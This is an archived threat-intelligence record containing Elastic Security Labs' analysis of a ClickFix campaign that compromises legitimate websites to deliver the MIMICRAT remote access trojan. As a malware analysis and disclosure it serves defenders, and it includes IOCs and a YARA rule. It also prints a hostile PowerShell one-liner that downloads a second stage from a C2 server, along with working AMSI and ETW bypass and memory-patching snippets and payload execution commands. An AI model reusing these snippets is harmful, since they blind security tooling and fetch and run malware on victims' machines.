{
	"id": "28a9c18e-e3aa-4915-a4ff-5765de24feac",
	"created_at": "2026-04-06T00:14:15.279554Z",
	"updated_at": "2026-04-10T13:11:38.233454Z",
	"deleted_at": null,
	"sha1_hash": "7929dba1af8e986834fdc8b57fee101f3f8a9983",
	"title": "MIMICRAT: ClickFix Campaign Delivers Custom RAT via Compromised Legitimate Websites",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2293323,
	"plain_text": "MIMICRAT: ClickFix Campaign Delivers Custom RAT via\r\nCompromised Legitimate Websites\r\nBy Salim Bitam\r\nPublished: 2026-02-20 · Archived: 2026-04-05 18:31:09 UTC\r\nIntroduction\r\nDuring a recent investigation, Elastic Security Labs identified an active ClickFix campaign compromising multiple\r\nlegitimate websites to deliver a multi-stage malware chain. Unlike simpler ClickFix deployments that terminate at\r\ncommodity infostealers, this campaign ends with a capable custom remote access trojan (RAT) we have called\r\nMIMICRAT: a native C implant with malleable C2 profiles, token impersonation, SOCKS5 tunneling, and a 22-\r\ncommand dispatch table.\r\nThe campaign demonstrates a high level of operational sophistication: compromised sites spanning multiple industries\r\nand geographies serve as delivery infrastructure, a multi-stage PowerShell chain performs ETW and AMSI bypass\r\nbefore dropping a Lua-scripted shellcode loader, and the final implant communicates over HTTPS on port 443 using\r\nHTTP profiles that resemble legitimate web analytics traffic.\r\nKey takeaways\r\nMultiple legitimate websites were compromised to deliver a five-stage attack chain.\r\nThe Lua loader executes embedded shellcode.\r\nMIMICRAT is a bespoke native C++ RAT with malleable C2 profiles, Windows token theft, and SOCKS5\r\nproxy.\r\nDiscovery\r\nElastic Security Labs first identified this campaign in early February 2026 through endpoint telemetry flagging\r\nsuspicious PowerShell execution with obfuscated command-line arguments.\r\nTelemetry: Obfuscated powershell execution\r\nGiven the novelty of the final payload, we publicly disclosed initial indicators via social media on February 11, 2026 to\r\nensure the broader security community could begin hunting for and defending against this threat while our full analysis\r\nwas underway. 
The campaign remains active as of this publication.\r\nhttps://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks\r\nPage 1 of 14\n\nResearchers at Huntress have documented related ClickFix campaigns using similar infrastructure and techniques,\r\nindicating the breadth of this threat actor's operations across multiple parallel campaigns.\r\nCampaign Delivery\r\nThe campaign's delivery relies entirely on compromising legitimate, trusted websites rather than attacker-owned\r\ninfrastructure. The entry point for victims is bincheck[.]io, a legitimate Bank Identification Number (BIN) validation\r\nservice. The threat actor compromised this site and injected a malicious JavaScript snippet that dynamically loads an\r\nexternal script hosted at https://www.investonline[.]in/js/jq.php on a second compromised site, a legitimate Indian\r\nmutual fund investment platform (Abchlor Investments Pvt. Ltd.). The external script is named to impersonate the\r\njQuery library, blending into the page's existing resource load.\r\nIt is this remotely loaded script (jq.php) that delivers the ClickFix lure: a fake Cloudflare verification page instructing\r\nthe victim to manually paste and execute a command to \"fix\" a problem. The lure copies a malicious PowerShell\r\ncommand directly to the victim's clipboard and prompts them to open a Run dialog (Win+R) or PowerShell prompt and\r\npaste it. This technique bypasses browser-based download protections entirely, as no file is downloaded.\r\nbincheck.io page source showing the injected script loading jq.php from investonline.in\r\nThis multidimensional compromise, in which a victim-facing website loads a malicious script from a second\r\ncompromised website, distributes detection risk and increases the perceived legitimacy of the lure to both users and\r\nautomated security tools. 
The campaign supports 17 languages, with the lure content dynamically localized based on the\r\nvictim's browser language settings to broaden its effective reach. Identified victims span multiple geographies, including\r\na USA-based university and multiple Chinese-speaking users documented in public forum discussions, suggesting broad\r\nopportunistic targeting.\r\nThe ClickFix lure supports the following languages:\r\nEnglish\r\nChinese\r\nRussian\r\nSpanish\r\nFrench\r\nGerman\r\nPortuguese\r\nJapanese\r\nKorean\r\nItalian\r\nTurkish\r\nPolish\r\nDutch\r\nVietnamese\r\nArabic\r\nHindi\r\nIndonesian\r\nCode analysis\r\nOnce the victim executes the clipboard command, the campaign unfolds across five distinct stages: an obfuscated\r\nPowerShell downloader contacts the C2 to retrieve a second-stage script that patches Windows event logging (ETW) and\r\nantivirus scanning (AMSI) before dropping a Lua-based loader; the loader decrypts and executes shellcode entirely in\r\nmemory; and the shellcode ultimately delivers MIMICRAT, a capable RAT designed for persistent access and lateral\r\nmovement.\r\nStage 1 PowerShell one-liner command\r\nThe clipboard-delivered command is a compact and obfuscated PowerShell one-liner:\r\npowershell.exe -WInDo Min $RdLU='aZmEwGEtHPckKyBXPxMRi.neTwOrkicsGf';$OnRa=($RdLU.Substring(17,12));$jOFn=.($RdLU[(8\r\nThe command uses string slicing and arithmetic index operations on a single seed string\r\n(aZmEwGEtHPckKyBXPxMRi.neTwOrkicsGf) to reconstruct both the target domain and the invocation mechanism at\r\nruntime, avoiding any plaintext representation of the C2 domain or PowerShell cmdlet names in the initial payload. The\r\nwindow is minimized (-WInDo Min). 
The extracted domain is xMRi.neTwOrk, which resolves to 45.13.212.250, and from which the one-liner\r\ndownloads a second-stage PowerShell script.\r\nInfrastructure pivoting on 45.13.212.250 via VirusTotal relations revealed a second domain, WexMrI.CC, resolving to\r\nthe same IP. Both domains share the same mixed-case formatting obfuscation pattern.\r\nPowerShell deobfuscation in a debug session: $HDjo resolves to WexMrI.CC\r\nStage 2 Obfuscated PowerShell script\r\nThe downloaded second-stage PowerShell script is significantly more elaborate. All strings are constructed at runtime\r\nby resolving arithmetic expressions to ASCII characters:\r\n$smaau = (-join[char[]](((7454404997-7439813680)/175799),(91873122/759282),...))\r\n# Resolves to: \"System.Diagnostics.Eventing.EventProvider\"\r\nThis technique renders the script opaque to static analysis and signature-based detection while remaining fully\r\nfunctional at runtime. A dummy class declaration is included as a decoy, and\r\nthe script executes four sequential operations:\r\nETW Bypass\r\nThe script accesses the internal m_enabled field of the System.Diagnostics.Eventing.EventProvider class via\r\nreflection and patches its value to 0, effectively disabling Event Tracing for Windows and blinding PowerShell script\r\nblock logging.\r\n[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetFie\r\nAMSI Bypass\r\nThe script then uses reflection to access System.Management.Automation.AmsiUtils and sets the amsiInitFailed\r\nfield to $true, causing PowerShell to skip all AMSI content scanning for the remainder of the session.\r\n[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetVal\r\nAMSI - Memory Patching\r\nThe script performs runtime method handle patching via Marshal.Copy in an additional but less common 
defense\r\nevasion step, overwriting method pointers in memory to redirect execution away from monitored code paths. This redirects\r\nthe ScanContent function of System.Management.Automation.AmsiUtils to an empty method (FHVcGSwOEM) of the decoy class.\r\n$ScanContent_func = [Ref].Assembly.GetType(\"System.Management.Automation.AmsiUtils\").GetMethods(\"NonPublic,Static\")\r\n$tttttttttt = [zsZRXVIIMQvZ].GetMethods() | Where-Object Name -eq \"FHVcGSwOEM\"\r\n[System.Runtime.InteropServices.Marshal]::Copy( @([System.Runtime.InteropServices.Marshal]::ReadIntPtr([long]$ttttttt\r\n 0,\r\n [long]$ScanContent_func.MethodHandle.Value + [long]8,\r\n 1\r\n)\r\nPayload Delivery\r\nWith event logging and AV scanning disabled, the script decodes a base64-encoded ZIP archive, extracts it to a\r\nrandomly named knz_{random} directory under %ProgramData%, and executes the contained binary zbuild.exe.\r\nTemporary artifacts are cleaned up post-execution.\r\n$extractTo = Join-Path $env:ProgramData (\"knz_{0}\" -f ([IO.Path]::GetRandomFileName()))\r\n[IO.Compression.ZipFile]::ExtractToDirectory($tempZip, $extractTo)\r\nStart-Process (Join-Path $extractTo 'zbuild.exe')\r\nStage 3 Lua loader\r\nThe dropped binary is a custom loader that statically embeds a Lua 5.4.7 interpreter.\r\nThe binary decrypts an embedded Lua script using an XOR stub at runtime, then executes it. 
The XOR decryption routine\r\n(fxh::utility::lua_script_xor_decrypt) iterates over the encrypted buffer, XORing each byte against a key.\r\nXOR decryption routine in the Lua loader\r\nThe Lua script implements a custom Base64 decoder with a non-standard alphabet to decode an embedded shellcode.\r\nThe decoded shellcode is then allocated in executable memory via luaalloc, copied into that memory with luacpy,\r\nand finally executed via luaexe, achieving fully in-memory, fileless shellcode execution.\r\nDecrypted Lua script\r\nStage 4 shellcode\r\nThe shellcode matched Meterpreter-related signatures, suggesting the shellcode stage is a loader consistent with the\r\nMeterpreter code family that reflectively loads MIMICRAT into memory.\r\nStage 5 MIMICRAT\r\nThe final payload, with a compilation timestamp of January 29, 2026, is a native x64 PE compiled with MSVC (Microsoft\r\nVisual Studio linker version 14.44). It does not exactly match any known open-source C2 framework, implementing its\r\nown malleable HTTP C2 profiles with ASCII-character-based command dispatch and a custom architecture.\r\nVirusTotal detection page\r\nC2 Configuration and communication\r\nMIMICRAT's configuration is stored in the .data section. It contains cryptographic keys, connection parameters, and\r\ntwo complete HTTP communication profiles. All header strings and URIs are hex-encoded ASCII, decoded at\r\nruntime.\r\nThe C2 operates over HTTPS on port 443 with a 10-second callback interval. 
The C2 server hostname\r\n(d15mawx0xveem1.cloudfront.net) is RC4-encrypted with the following RC4 key:\r\n@z1@@9\u0026Yv6GR6vp#SyeG\u0026ZkY0X74%JXLJEv2Ci8\u0026J80AlVRJk\u00266Cl$Hb)%a8dgqthEa6!jbn70i27d4bLcE33acSoSaSsq6KpRaA7xDypo(5\r\nThe implant uses HTTPS for communication with a layered encryption scheme: an embedded RSA-1024 public key\r\nhandles asymmetric session key exchange.\r\nImporting the RSA public key\r\nAES is used for symmetric encryption of C2 traffic, with a hardcoded IV (abcdefghijklmnop) and a runtime-calculated\r\nkey derived from the SHA-256 hash of a randomly generated alphanumeric value (for example, 9ZQs0p0gfpOj3Y02).\r\nAES encryption\r\nThe following are the profiles used by the sample for GET and POST requests:\r\nHTTP GET Profile: Check-in and Tasking\r\nComponent | Value\r\nURI | /intake/organizations/events?channel=app\r\nUser-Agent | Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.9.19041; ...) Edge/18.19045\r\nReferer | https://www.google.com/?q=dj1\r\nAccept-Language | zh-CN,zh;q=0.9\r\nCookies | AFUAK, BLA, HFK\r\nHTTP POST Profile: Data Exfiltration\r\nComponent | Value\r\nURI | /discover/pcversion/metrics?clientver=ds\r\nReferer | https://gsov.google.com/\r\nCookies | ARCHUID, BRCHD, ZRCHUSR\r\nCommand Dispatch\r\nMIMICRAT implements a total of 22 distinct commands that provide post-exploitation capabilities such as process and file\r\nsystem control, interactive shell access, token manipulation, shellcode injection, and SOCKS proxy tunneling. The\r\nbeacon interval and jitter are operator-configurable at runtime via dedicated commands. 
The following is a summarized\r\ntable of all the implemented commands:\r\nCmd ID | Function | Description\r\n3 | Exit | Terminates the implant process\r\n4 | Set beacon interval | Configures sleep duration and jitter\r\n5 | Change directory | Changes the current working directory\r\n10 | Write file | Writes a C2-supplied payload to disk (overwrite)\r\n11 | Read file | Reads a file from disk and exfiltrates its contents to the C2\r\n12 | Spawn process | Launches a process using a stolen token if available, falling back to standard execution\r\n28 | Revert impersonation | Reverts token impersonation and clears token state\r\n31 | Steal token | Duplicates the security token of a target process by PID\r\n32 | List processes | Enumerates running processes with PID, PPID, user, domain, and architecture\r\n33 | Kill process | Terminates a process by PID\r\n39 | Get current directory | Returns the current working directory to the C2\r\n53 | List files | Lists files and directories with timestamps and sizes\r\n54 | Create directory | Creates a directory on disk\r\n55 | List drives | Enumerates logical drives\r\n56 | Delete file/directory | Deletes a file or removes a directory\r\n67 | Append to file | Appends C2-supplied data to an existing file\r\n73 | Copy file | Copies a file from source to destination\r\n74 | Move/rename file | Moves or renames a file\r\n78 | Interactive shell | Opens a persistent interactive CMD shell over a pipe\r\n100 | Inject shellcode | Reflective shellcode injection\r\n101 | SOCKS | Configures or stops the SOCKS proxy channel\r\n102 | SOCKS proxy | Shares its handler with command 101; most likely a placeholder command\r\nInfrastructure\r\nThe campaign's network infrastructure clusters into two primary groups:\r\nCluster A: Initial Payload Delivery (45.13.212.251 / 45.13.212.250)\r\nMultiple domains point to this IP range, including xMRi.neTwOrk and WexMrI.CC. Domain naming uses mixed-case\r\nobfuscation. 
This infrastructure serves the second-stage PowerShell script and the embedded payload ZIP.\r\nVirusTotal relations for 45.13.212.251 showing multiple campaign domains resolving to this IP\r\nCluster B: Post-Exploitation C2 (23.227.202.114)\r\nAssociated with www.ndibstersoft[.]com and observed in beacon communications from the dropped file. This\r\nrepresents the operator's post-exploitation C2 channel.\r\nCloudFront C2 Relay\r\nd15mawx0xveem1.cloudfront[.]net is confirmed as part of MIMICRAT's C2 infrastructure. VT relations for the\r\nrgen.zip sample show it contacting this CloudFront domain using the same /intake/organizations/events?channel=app\r\nURI pattern identified in MIMICRAT's GET profile, confirming that it acts as a C2 relay fronting the\r\nbackend server.\r\nDelivery Infrastructure\r\nTwo compromised legitimate websites form the delivery chain:\r\nbincheck.io — victim-facing entry point; compromised to load the external malicious script\r\ninvestonline.in — hosts the ClickFix JavaScript payload (/js/jq.php) disguised as jQuery; this script\r\nrenders the lure and delivers the clipboard PowerShell\r\nMalware and MITRE ATT\u0026CK\r\nElastic uses the MITRE ATT\u0026CK framework to document common tactics, techniques, and procedures that advanced\r\npersistent threats use against enterprise networks.\r\nTactics\r\nTactics represent the why of a technique or sub-technique. 
It is the adversary’s tactical goal: the reason for performing\r\nan action.\r\nInitial Access\r\nExecution\r\nDefense Evasion\r\nPersistence\r\nPrivilege Escalation\r\nDiscovery\r\nExfiltration\r\nCommand and Control\r\nTechniques\r\nTechniques represent how an adversary achieves a tactical goal by performing an action.\r\nPhishing: Spearphishing via Service (ClickFix clipboard)\r\nUser Execution: Malicious Link\r\nCommand and Scripting Interpreter: PowerShell\r\nObfuscated Files or Information: Command Obfuscation\r\nImpair Defenses: Disable or Modify Tools (AMSI bypass)\r\nImpair Defenses: Disable Windows Event Logging (ETW patch)\r\nReflective Code Loading / In-Memory Execution\r\nScheduled Task/Job\r\nAccess Token Manipulation: Token Impersonation/Theft\r\nProcess Injection\r\nProcess Discovery\r\nFile and Directory Discovery\r\nExfiltration Over C2 Channel\r\nApplication Layer Protocol: Web Protocols (HTTPS)\r\nProxy\r\nMitigations\r\nDetection\r\nThe following detection rules and behavior prevention events were observed throughout the analysis of this intrusion\r\nset:\r\nExecution via Obfuscated PowerShell Script\r\nDNS Query to Suspicious Top Level Domain\r\nSuspicious Command Shell Execution via Windows Run\r\nToken theft and impersonation\r\nPotential Privilege Escalation via Token Impersonation\r\nShellcode Execution from Low Reputation Module\r\nYARA\r\nElastic Security has created YARA rules to identify this activity. 
Below is the YARA rule that identifies MimicRat:\r\nrule Windows_Trojan_MimicRat {\r\n meta:\r\n author = \"Elastic Security\"\r\n creation_date = \"2026-02-13\"\r\n last_modified = \"2026-02-13\"\r\n os = \"Windows\"\r\n arch = \"x86\"\r\n category_type = \"Trojan\"\r\n family = \"MimicRat\"\r\n threat_name = \"Windows.Trojan.MimicRat\"\r\n reference_sample = \"a508d0bb583dc6e5f97b6094f8f910b5b6f2b9d5528c04e4dee62c343fce6f4b\"\r\n scan_type = \"File, Memory\"\r\n severity = 100\r\n strings:\r\n $b_0 = { 41 8B 56 18 49 8B 4E 10 41 89 46 08 }\r\n $b_1 = { 41 FF C0 48 FF C1 48 83 C2 4C 49 3B CA }\r\n condition:\r\n all of them\r\n}\r\nObservations\r\nThe following observables were discussed in this research.\r\nObservable | Type | Reference\r\nbcc7a0e53ebc62c77b7b6e3585166bfd7164f65a8115e7c8bda568279ab4f6f1 | SHA-256 | Stage 1 PowerShell payload\r\n5e0a30d8d91d5fd46da73f3e6555936233d870ac789ca7dd64c9d3cc74719f51 | SHA-256 | Lua loader\r\na508d0bb583dc6e5f97b6094f8f910b5b6f2b9d5528c04e4dee62c343fce6f4b | SHA-256 | MIMICRAT beacon\r\n055336daf2ac9d5bbc329fd52bb539085d00e2302fa75a0c7e9d52f540b28beb | SHA-256 | Related beacon sample\r\n45.13.212.251 | IP | Payload delivery infrastructure\r\n45.13.212.250 | IP | Payload delivery infrastructure\r\n23.227.202.114 | IP | Post-exploitation C2\r\nxmri.network | Domain | Stage 1 C2 / payload delivery\r\nwexmri.cc | Domain | Stage 1 C2 alternate\r\nwww.ndibstersoft[.]com | Domain | Post-exploitation C2\r\nd15mawx0xveem1.cloudfront[.]net | Domain | Post-exploitation C2\r\nwww.investonline.in/js/jq.php | URL | Malicious JS payload host (compromised)\r\nbackupdailyawss.s3.us-east-1.amazonaws[.]com/rgen.zip | URL | Payload delivery\r\nSource: 
https://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks"
	],
	"report_names": [
		"mimicrat-custom-rat-mimics-c2-frameworks"
	],
	"threat_actors": [],
	"ts_created_at": 1775434455,
	"ts_updated_at": 1775826698,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7929dba1af8e986834fdc8b57fee101f3f8a9983.pdf",
		"text": "https://archive.orkl.eu/7929dba1af8e986834fdc8b57fee101f3f8a9983.txt",
		"img": "https://archive.orkl.eu/7929dba1af8e986834fdc8b57fee101f3f8a9983.jpg"
	}
}